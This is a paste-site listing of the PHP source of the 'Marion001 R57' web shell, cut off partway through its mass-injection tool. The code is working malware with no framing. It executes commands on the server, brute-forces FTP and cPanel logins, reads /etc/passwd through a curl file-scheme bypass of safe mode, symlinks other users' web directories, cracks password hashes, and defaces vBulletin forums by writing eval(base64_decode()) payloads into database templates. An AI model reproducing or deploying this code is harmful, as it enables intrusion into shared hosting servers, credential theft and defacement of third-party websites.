Gravatar Avatar

Pack shell r57

By: a guest on February 3, 2016  |  syntax: PHP  |  size: 125.0 KB  |  hits: 42  |  expires: never
download  |  raw  |  embed  |  report abuse
Copied
  1. <?php
  2. $head = '
  3. <html><head></script><title>Marion001 Shell R57</title>
  4. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  5. <STYLE>
  6. body {
  7. font-family: Tahoma
  8. }
  9. tr {
  10. BORDER-RIGHT:  #Black 1px solid;
  11. BORDER-TOP:    Black 1px solid;
  12. BORDER-LEFT:   Black 1px solid;
  13. BORDER-BOTTOM: #Black 1px solid;
  14. BORDER-COLOR: #008082;
  15. color: #d8d8d8;
  16. }
  17. td {
  18. BORDER-RIGHT:  #Black 1px solid;
  19. BORDER-TOP:    Black 1px solid;
  20. BORDER-LEFT:   Black 1px solid;
  21. BORDER-BOTTOM: #Black 1px solid;
  22. BORDER-COLOR: #008082;
  23. color: #d8d8d8;
  24. }
  25. .table1 {
  26. BORDER: 0px;
  27. BORDER-COLOR: #008082;
  28. BACKGROUND-COLOR: Black;
  29. color: #d8d8d8;
  30. }
  31. .td1 {
  32. BORDER: 0px;
  33. BORDER-COLOR: #008082;
  34. font: 7pt Tahoma;
  35. color: #d8d8d8;
  36. }
  37. .tr1 {
  38. BORDER: 0px;
  39. BORDER-COLOR: #008082;
  40. color: #d8d8d8;
  41. }
  42. table {
  43. BORDER:  Black 1px outset;
  44. BORDER-COLOR: #008082;
  45. BACKGROUND-COLOR: Black;
  46. color: #d8d8d8;
  47. }
  48. input {
  49. border                  : solid 1px;
  50. border-color            : #2aff00 #2aff00 #2aff00 #2aff00;
  51. BACKGROUND-COLOR: Black;
  52. font: 8pt Tahoma;
  53. color: #d8d8d8;
  54. }
  55. select {
  56. BORDER-RIGHT:  Black 1px solid;
  57. BORDER-TOP:    #2aff00 1px solid;
  58. BORDER-LEFT:   #2aff00 1px solid;
  59. BORDER-BOTTOM: Black 1px solid;
  60. BORDER-color: #d8d8d8;
  61. BACKGROUND-COLOR: Black;
  62. font: 8pt Tahoma;
  63. color: Red;
  64. }
  65. submit {
  66. BORDER:  buttonhighlight 2px outset;
  67. BACKGROUND-COLOR: Black;
  68. width: 30%;
  69. color: #d8d8d8;
  70. }
  71. textarea {
  72. BORDER-RIGHT:  Black 1px solid;
  73. BORDER-TOP:    #2aff00 1px solid;
  74. BORDER-LEFT:   #2aff00 1px solid;
  75. BORDER-BOTTOM: Black 1px solid;
  76. BORDER-COLOR: #008082;
  77. BACKGROUND-COLOR: Black;
  78. font: Fixedsys bold;
  79. color: #d8d8d8;
  80. }
  81. BODY {
  82.         SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #d8d8d8; SCROLLBAR-SHADOW-color: #d8d8d8; SCROLLBAR-3DLIGHT-color: #d8d8d8; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #d8d8d8; SCROLLBAR-DARKSHADOW-color: #d8d8d8
  83. margin: 1px;
  84. color: Red;
  85. background-color: Black;
  86. }
  87. .main {
  88. margin                  : -287px 0px 0px -490px;
  89. border                  : #2aff00 solid 1px;
  90. BORDER-COLOR: #005d5e;
  91. }
  92. .tt {
  93. background-color: Black;
  94. }
  95.  
  96. A:link {
  97.         COLOR: White; TEXT-DECORATION: none
  98. }
  99. A:visited {
  100.         COLOR: White; TEXT-DECORATION: none
  101. }
  102. A:hover {
  103.         color: Red; TEXT-DECORATION: none
  104. }
  105. A:active {
  106.         color: Red; TEXT-DECORATION: none
  107. }
  108. </STYLE><script language=\'javascript\'>
  109. function hide_div(id)
  110. {
  111.  document.getElementById(id).style.display = \'none\';
  112.  document.cookie=id+\'=0;\';
  113. }
  114. function show_div(id)
  115. {
  116.  document.getElementById(id).style.display = \'block\';
  117.  document.cookie=id+\'=1;\';
  118. }
  119. function change_divst(id)
  120. {
  121.  if (document.getElementById(id).style.display == \'none\')
  122.    show_div(id);
  123.  else
  124.    hide_div(id);
  125. }
  126. </script>';
  127. $info['security'] = false;
  128. $info['uname'] = "1ec47363cf1e60f632dd14139989b813";
  129. $info['pword'] = "4297f44b13955235245b2497399d7a93";
  130. $info['title'] = "TheSunOfVN";
  131. $info['ownsessions'] = false;
  132. foreach ($info as $key => $val) {
  133.   if (!isset($tacfg[$key])) $tacfg[$key] = $val;
  134. }
  135. if (!$tacfg['ownsessions']) {
  136.   session_name('txtauth');
  137. }
  138. if (isset($_GET['logout']) || isset($_POST['logout'])) {
  139.   setcookie('txtauth_'.$rmgroup, '', time()-86400*14);
  140.   if (!$tacfg['ownsessions']) {
  141.     $_SESSION = array();
  142.   }
  143.   else $_SESSION['txtauthin'] = false;
  144.   system32($_SERVER['HTTP_HOST'],$_SERVER['REQUEST_URI']);
  145. }
  146. elseif (isset($_POST['login'])) {
  147.         $uname = md5($_POST['uname']);
  148.         $upass = md5($_POST['pword']);
  149.   if ($uname == $tacfg['uname'] && $upass == $tacfg['pword']) {
  150.     $_SESSION['txtauthin'] = true;
  151.     if ($_POST['rm']) {
  152.       setcookie('txtauth_'.$rmgroup, md5($tacfg['uname'].$tacfg['pword']), time()+86400*14);
  153.     }
  154.   }
  155.   else $err = 'Login Failed !';
  156.   system32($_SERVER['HTTP_HOST'],$_SERVER['REQUEST_URI']);
  157. }
  158. elseif (isset($_COOKIE['txtauth_'.$rmgroup])) {
  159.         if (md5($tacfg['uname'].$tacfg['pword']) == $_COOKIE['txtauth_'.$rmgroup] && $tacfg['allowrm']) {
  160.                 $_SESSION['txtauthin'] = true;
  161.         }
  162.         else $err = 'Login Failed !';
  163. }
  164. if ($info['security']) {
  165. if (!$_SESSION['txtauthin']) {
  166. @ini_restore("safe_mode");
  167. @ini_restore("open_basedir");
  168. @ini_restore("safe_mode_include_dir");
  169. @ini_restore("safe_mode_exec_dir");
  170. @ini_restore("disable_functions");
  171. @ini_restore("allow_url_fopen");
  172. @ini_set('error_log',NULL);
  173. @ini_set('log_errors',0);
  174. echo $head;
  175. ?>
  176. <body><br><br><div style="font-size: 14pt;" align="center">Marion001 R57 shell</div><hr width="300" size="1" noshade color="#cdcdcd"><p><p>
  177. <?
  178. if (isset($_SERVER['REQUEST_URI'])) $action = $_SERVER['REQUEST_URI'];
  179. else $action = $_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];
  180. if (strpos($action, 'logout=1', strpos($action, '?')) !== false) $action = str_replace('logout=1', '', $action);
  181. ?>
  182. <form name="txtauth" action="<?=$action?>" method="post">
  183. <div align="center">
  184. <table border="0" cellpadding="4" cellspacing="0" bgcolor="#666666" style="border: 1px double #dedede;" dir="ltr">
  185. <?=(isset($err))?'<tr><td colspan="2" align="center"><font color="red">'.$err.'</font></td></tr>':''?>
  186. <?if (isset($tacfg['uname'])) {?>
  187. <tr><td>User:</td><td><input type="text" name="uname" value="" size="20" maxlength="100" class="txtbox"></td></tr>
  188. <?}?>
  189. <tr><td>Password:</td><td><input type="password" name="pword" value="" size="20" maxlength="100" class="txtbox"></td></tr>
  190. <?if ($tacfg['allowrm']) {?>
  191. <tr><td align="left"><input type="submit" name="login" value="Login">
  192. </td><td align="right"><input type="checkbox" name="rm" id="rm"><label for="rm"> Remmeber Me?</label></td></tr>
  193. <?} else {?>
  194. <tr><td colspan="2" align="center"><input type="submit" name="login" value="Login"></td></tr><?}?>
  195. </table></div></form><br><br><hr width="300" size="1" noshade color="#cdcdcd">
  196. <div class="smalltxt" align="center"><b>Edited by TheSunOfVN</b></div></body></html>
  197. <?
  198.         exit();
  199.         }
  200. }
  201. if (isset($_GET['ln'])) {
  202. $fp = fopen('users.txt','r');
  203. $fr = fread($fp,filesize('users.txt'));
  204. fclose($fp);
  205. preg_match_all('/(.+?):x:(.+?)/',$fr,$explode);
  206. foreach($explode[1] as $user) {
  207. system("ln -s /home/$user/public_html/ $user");
  208. }
  209. header("Location: ".$_SERVER['PHP_SELF']);
  210. }
  211. if (isset($_GET['brute'])) {
  212. ?><html><head><meta http-equiv="Content-Language" content="en-us"></head>
  213. <title> BruteForcer v1.0 </title><style>
  214. body{margin:0px;font-style:normal;font-size:10px;color:#fff;font-family:Verdana,Arial;background-color:#000;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}
  215. input,
  216. .kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
  217. button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
  218. body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
  219. a:active { outline: none; }
  220. a:focus { -moz-outline-style: none; }
  221. table {
  222.   border: 2px dashed #fff;
  223.   background:#000;
  224.   color: #fff;
  225.   font-weight: bold;
  226.   font-family:"Comic Sans MS";
  227.   }
  228. </style><style type='text/css'>
  229.   <!--
  230.        A:link {text-decoration: none; color:#cccccc }
  231.        A:visited {text-decoration: none; color:#cccccc }
  232.        a:hover {text-decoration: none; color:Red}
  233.   -->
  234. </style>
  235. <?php
  236. @ini_set('memory_limit', 1000000000000);
  237. $connect_timeout=5;
  238. $submit = $_REQUEST['submit'];
  239. $users = $_REQUEST['users'];
  240. $pass = $_REQUEST['passwords'];
  241. $target = $_REQUEST['target'];
  242. $option = $_REQUEST['option'];
  243. $thesunofvn = $_GET['thesunofvn'];
  244. if($target == ''){
  245. $target = 'localhost';
  246. }
  247. ?>
  248. <?php
  249.  print "<br><br><br><center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='70%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td width='70%'>
  250. <br><b><center><a href='?brute&thesunofvn=crack'> brute </a> -
  251. <a href='?brute&thesunofvn=listuser1'> Get users </a> -  
  252. <a href='?brute&thesunofvn=bypass'> Bypass </a> -
  253. <font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]
  254. <br><br></center></td></tr></table>";
  255. if( $thesunofvn == 'crack'){
  256. @ini_set('memory_limit', 1000000000000);
  257. $connect_timeout=5;
  258. $submit = $_REQUEST['submit'];
  259. $users = $_REQUEST['users'];
  260. $pass = $_REQUEST['passwords'];
  261. $target = $_REQUEST['target'];
  262. $option = $_REQUEST['option'];
  263. if($target == ''){
  264. $target = 'localhost';
  265. }
  266. print " <div align='center'>
  267. <form method='post' style='border: 1px solid #000000'><br><br>
  268. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
  269. <b> Target  : </font><input type='text' name='target' size='16' value= $target style='border: font-family:Verdana; font-weight:bold;'></p></font></b></p>
  270. <div align='center'><br>
  271. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
  272. <tr><td align='center'><b>Username</b></td><td><p align='center'><b>Password</b></td></tr></table><p align='center'>
  273. <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$users</textarea>
  274. <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>123pass
  275. pass123</textarea><br><br>                        
  276. <b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
  277. <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='brute' name='submit' ></p>
  278. </td></tr></table></td></tr></form><p align= 'left'>";
  279. ?>
  280. <?php
  281. function ftp_check($host,$user,$pass,$timeout){
  282. $ch = curl_init();
  283. curl_setopt($ch, CURLOPT_URL, "ftp://$host");
  284. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  285. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  286. curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  287. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  288. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  289. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  290. $data = curl_exec($ch);
  291. if ( curl_errno($ch) == 28 ) {
  292. print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
  293. elseif ( curl_errno($ch) == 0 ){
  294. if ($host == 'localhost') {
  295. $link = "ftp://$user:$pass@".$_SERVER['SERVER_ADDR'];
  296. } else {
  297. $link = "ftp://$user:$pass@".$host;
  298. }
  299. print "<b><font color=Red> $user </font> | <font color=Red> $pass </font> [ <a href='$link'>$link</a> ]</b><br>";}curl_close($ch);}
  300. function cpanel_check($host,$user,$pass,$timeout){
  301. $ch = curl_init();
  302. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  303. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  304. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  305. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  306. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  307. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  308. $data = curl_exec($ch);
  309. if ( curl_errno($ch) == 28 ) {
  310. print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
  311. elseif ( curl_errno($ch) == 0 ){
  312. if ($host == 'localhost') {
  313. $link = "http://$user:$pass@".$_SERVER['SERVER_ADDR'].":2082";
  314. } else {
  315. $link = "http://$user:$pass@".$host.":2082";
  316. }
  317. print "<b><font color=Red> $user </font> | <font color=Red> $pass </font> [ <a href='$link'>$link</a> ]</b><br>";}curl_close($ch);}
  318. if(isset($submit) && !empty($submit)){
  319. $userlist = explode ("\n" , $users );
  320. $passlist = explode ("\n" , $pass );
  321. print "<b>[ Start : ]# Attacking ...</font></b><br><br>";
  322. foreach ($userlist as $user) {
  323. $_user = trim($user);
  324. foreach ($passlist as $password ) {
  325. $_pass = trim($password);
  326. if($option == "ftp"){
  327. ftp_check($target,$_user,$_pass,$connect_timeout);
  328. }
  329. if ($option == "cpanel")
  330. {
  331. cpanel_check($target,$_user,$_pass,$connect_timeout);
  332. }
  333. }
  334. }
  335. print "<br><b>[ Now : ]# F!nish3d ...</font></b><br>";
  336. }
  337. exit();
  338. }elseif ( $thesunofvn == 'listuser1'){
  339. echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>";
  340. echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="/etc/passwd"><input type="submit" name="hardstylez" value="grab !"></form>';
  341. $file = $_POST['file'];
  342. $level=0;
  343. if(!file_exists("file:"))
  344. @mkdir("file:");
  345. @chdir("file:");
  346. $level++;
  347. $hardstyle = @explode("/", $file);
  348. for($a=0;$a<count($hardstyle);$a++){
  349.     if(!empty($hardstyle[$a])){
  350.         if(!file_exists($hardstyle[$a]))
  351.             @mkdir($hardstyle[$a]);
  352.         @chdir($hardstyle[$a]);
  353.         $level++;
  354.     }
  355. }
  356. while($level--) chdir("..");
  357. $ch = curl_init();
  358. curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
  359. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  360. $result = curl_exec($ch);
  361. echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
  362. if ($result == FALSE)
  363. { die("Failed!");
  364. } else {
  365. if (preg_match_all('/(.+?):x:(.+?)/',$result,$explode)) {
  366. foreach($explode[1] as $user) {echo $user."\n";}
  367. } else { echo $result;}
  368. }
  369. echo ' </textarea> </FONT>';
  370. print '</table>';
  371. exit();
  372. }
  373. elseif ( $thesunofvn == 'bypass'){echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%'bgColor=#303030
  374. borderColorLight=#966117 border=1><tr><td>";
  375. echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="100" value="'.htmlspecialchars($file).'">
  376. <input type="submit" name="hardstylez" value="get !"></form>';
  377. $file = $_POST['file'];
  378. $level=0;
  379. if(!file_exists("file:"))
  380.     @mkdir("file:");
  381. @chdir("file:");
  382. $level++;
  383. $hardstyle = @explode("/", $file);
  384. for($a=0;$a<count($hardstyle);$a++){
  385.     if(!empty($hardstyle[$a])){
  386.         if(!file_exists($hardstyle[$a]))
  387.             @mkdir($hardstyle[$a]);
  388.         @chdir($hardstyle[$a]);
  389.         $level++;
  390.     }
  391. }
  392. while($level--) chdir("..");
  393. $ch = curl_init();
  394. curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
  395. echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
  396. if(FALSE==curl_exec($ch))
  397. die('Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
  398. echo ' </textarea> </FONT>';
  399. print '</table>';}
  400.  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  401. exit();
  402. }
  403. if(isset($_GET['tools'])) {
  404. if ($info['security']) echo $head."<body>Login As (<font color='#FF0000'>".$info['title']."</font>) <a href='?logout=1'>Logout</a></p>";
  405. else echo $head;
  406. echo "<center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#FFFFFF cellPadding=5 width='70%' bgColor=#303030 borderColorLight=#FFFFFF border=1><tr><td width='70%'>
  407. <br><b><center>
  408. <a href='?tools&act=encoder'> Encoder </a> - <a href='?tools&act=fsbuff'> Buffer </a> - <a href='?tools&act=selfremove'> Self Remove </a> -
  409. <a href='?tools&act=massbrowsersploit'> Mass Code Injection </a> -
  410. <a href='?tools&act=fakelogin'> Fake Login </a> - <a href='?tools&act=deface'>Vbulletin Deface</a><br><br></center></td></tr></table>";
  411. $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
  412. $sf="<form method=post>";$ef="</form>";
  413. $st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
  414. $et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
  415. $c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
  416. $sta="<textarea cols=157 rows=23>";$eta="</textarea>";
  417. $sfnt="<font face=tahoma size=2 color=#008080>";$efnt="</font>";
  418. if(version_compare(phpversion(), '4.1.0') == -1)
  419.  {$_POST   = &$HTTP_POST_VARS;$_GET    = &$HTTP_GET_VARS;
  420.  $_SERVER = &$HTTP_SERVER_VARS;
  421.  }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
  422. if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
  423. elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
  424. else{return $requ."?".$link."=".$val;}}
  425. function delm($delmtxt){print"<center><table bgcolor=black style='border:1px solid olive' width=99% height=2%>";print"<tr><td><b><center><font size=2 color=olive>$delmtxt</td></tr></table></center>";}
  426. function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
  427. $nscmd=htmlspecialchars($scmd);print $nscmd;}
  428. elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
  429. $ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
  430. elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
  431. while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
  432. print $res;}pclose($pcmd);}elseif(!function_exists(popen)){
  433. ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
  434. print htmlspecialchars($pret);}}
  435. function input($type,$name,$value,$size)
  436. {if (empty($value)){print "<input type=$type name=$name size=$size>";}
  437. elseif(empty($name)&($size)){print "<input type=$type value=$value >";}
  438. elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
  439. else {print "<input type=$type name=$name value=$value size=$size >";}}
  440. function permcol($path){if (is_writable($path)){print "<font color=olive>";
  441. callperms($path); print "</font>";}
  442. elseif (!is_readable($path)&&!is_writable($path)){print "<font color=red>";
  443. callperms($path); print "</font>";}
  444. else {print "<font color=white>";callperms($path);}}
  445. if ($dlink=="dwld"){download($_REQUEST['dwld']);}
  446. function download($dwfile) {$size = filesize($dwfile);
  447. @header("Content-Type: application/force-download;name=$dwfile");
  448. @header("Content-Transfer-Encoding: binary");
  449. @header("Content-Length: $size");
  450. @header("Content-Disposition: attachment; filename=$dwfile");
  451. @header("Expires: 0");
  452. @header("Cache-Control: no-cache, must-revalidate");
  453. @header("Pragma: no-cache");
  454. @readfile($dwfile); exit;}
  455. $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
  456. $sf="<form method=post>";$ef="</form>";
  457. $st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
  458. $et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
  459. $c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
  460. $sta="<textarea cols=157 rows=23>";$eta="</textarea>";
  461. $sfnt="<font face=tahoma size=2 color=olive>";$efnt="</font>";
  462. print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "";
  463. if($_GET['act']=="encoder")
  464. {
  465.  echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
  466.  foreach(array("md5","crypt","sha1","crc32") as $v)
  467.  {
  468.   echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
  469.  }
  470.  echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
  471. <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
  472. <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
  473.  echo "<center>base64_decode - ";
  474.  if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
  475.  else
  476.  {
  477.   $debase64 = base64_decode($encoder_input);
  478.   $debase64 = str_replace("\0","[0]",$debase64);
  479.   $a = explode("\r\n",$debase64);
  480.   $rows = count($a);
  481.   $debase64 = htmlspecialchars($debase64);
  482.   if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
  483.   else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
  484.   echo " <a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
  485.  }
  486.  echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
  487.  $c = strlen($encoder_input);
  488.  for($i=0;$i<$c;$i++)
  489.  {
  490.   $hex = dechex(ord($encoder_input[$i]));
  491.   if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
  492.   elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
  493.  }
  494.  echo "\" readonly><br></form>";
  495. ?>
  496. </center><br><br><table border=0 align=center cellpadding=4><tr><td><center><b>Search milw0rm for MD5 hash</b></center></td><td>
  497. <center><b>Search md5encryption.com for MD5 or SHA1 hash</b></center></td><td><center><b>Search CsTeam for MD5 hash</b></center>
  498. </td></tr><tr><td><center><form target="_blank" action="http://www.milw0rm.com/cracker/search.php" method=POST>
  499. <input type=text size=40 name=hash> <input type=submit value="Submit"></form></center></td><td><center>
  500. <form target="_blank" action="http://www.md5encryption.com/?mod=decrypt" method=POST>
  501. <input type=text size=40 name=hash2word> <input type=submit value="Submit"></form>
  502. </center></td><td><center><form target="_blank" action="http://www.csthis.com/md5/index.php" method=POST>
  503. <input type=text size=40 name=h> <input type=submit value="Submit"></form></center></td></tr></table><br><center>
  504. <?php
  505. if (isset($_GET['hash']) && isset($_GET['wordlist']) && ($_GET['type'] == 'md5' || $_GET['type'] == 'sha1')) {
  506.         $type = $_GET['type'];
  507.         $hash = $_GET['hash'];
  508.         $count = 1;
  509.         $wordlist = file($_GET['wordlist']);
  510.         $words = count($wordlist);
  511.         foreach ($wordlist as $word) {
  512.                 echo $count.' of '.$words.': '.$word.'<br>';
  513.                 if ($hash == $type(rtrim($word))) {
  514.                         echo '<font color=red>Great success!  The password is: '.$word.'</font><br>';
  515.                         exit;
  516.                 }
  517.                 ++$count;
  518.         }
  519. }
  520. }
  521. if($_GET['act']=="fsbuff")
  522. {
  523.  $arr_copy = $sess_data["copy"];
  524.  $arr_cut = $sess_data["cut"];
  525.  $arr = array_merge($arr_copy,$arr_cut);
  526.  if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
  527.  else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
  528. }
  529. if($_GET['act']=="selfremove")
  530. {
  531.  if (($submit == $rndcode) and ($submit != ""))
  532.  {
  533.   if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); }
  534.   else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
  535.  }
  536.  else
  537.  {
  538.   if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
  539.   $rnd = rand(0,9).rand(0,9).rand(0,9);
  540.   echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>: <input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit> <input type=submit value=\"YES\"></form>";
  541.  }
  542. }
  543. if($_GET['act']=="deface") {
  544. echo $head; echo "
  545. <center><h2 class='style1'>Vbulletin Deface</h2><div id=haberler align=left><form method=POST action=''>
  546. <p align=center class='style1'> </p><div class='style3' align=center>
  547. <span class='style2'>Host</span><font face='Arial' color='#ffffff'>:</font><span class='style1'><input type=text name=dbh value=localhost size='15' ></span>
  548. <font face='Arial' color='#ffffff'> Database Name:</font><span class='style1'><input type=text name=dbn size='15' ><br>Database User
  549. </span><font face='Arial' color='#ffffff'>:</font><span class='style1'><input type=text name=dbu size='15' ></span>
  550. <font face='Arial' color='#ffffff'> Database Pass:  </font><span class='style1'><input type=text name=dbp size='16' ><br></span></div>
  551. <center class='style1'><textarea name=index rows='5' cols='33' >echo '_____ Marion001-VietNam _____';</textarea></center>
  552. <center class='style1'><input type=submit value='Deface It!!!' ></form></center></center></body></center>";
  553. $h4cker="[Edited] by Marion001";
  554. if (!empty($_POST['dbh']) && !empty($_POST['dbn']) && !empty($_POST['dbu']) && !empty($_POST['index']))
  555. {
  556. $dbh = $_POST['dbh'];
  557. $dbn = $_POST['dbn'];
  558. $dbu = $_POST['dbu'];
  559. $dbp = $_POST['dbp'];
  560. $index=str_replace("\'","'",$index);
  561. $set_index  = "{\${eval(base64_decode(\'".base64_encode($index);
  562. //$set_index .= base64_encode("eval ('$index');");
  563. $set_index .= "\'))}}{\${exit()}}";
  564. mysql_connect($dbh,$dbu,$dbp) or die(mysql_error());
  565. $fatal1 = "UPDATE template SET template='".$set_index."".$h4cker."' WHERE title='spacer_open'";
  566. $fatal2 = "UPDATE template SET template='".$set_index."".$h4cker."' WHERE title='FORUMHOME'";
  567. $fatal3 = "UPDATE style SET css='".$set_index."".$h4cker."', stylevars='', csscolors='', editorstyles=''";
  568. $result = mysql_query($fatal1) or die (mysql_error());
  569. $result2 = mysql_query($fatal2) or die (mysql_error());
  570. $result3 = mysql_query($fatal3) or die (mysql_error());
  571. if ($result && $result2 && $result3) echo "<center>Done!!!</center>";
  572. }
  573. }
  574. if($_GET['act']=="massbrowsersploit"){
  575. echo $head;
  576. ?><body>Use this to add HTML to the end of every .php, .htm, and .html page in the directory specified.<br><br>
  577. <form action="" method=GET><input type=hidden name="masssploit" value="goahead"><input type=hidden name="act" value="massbrowsersploit">
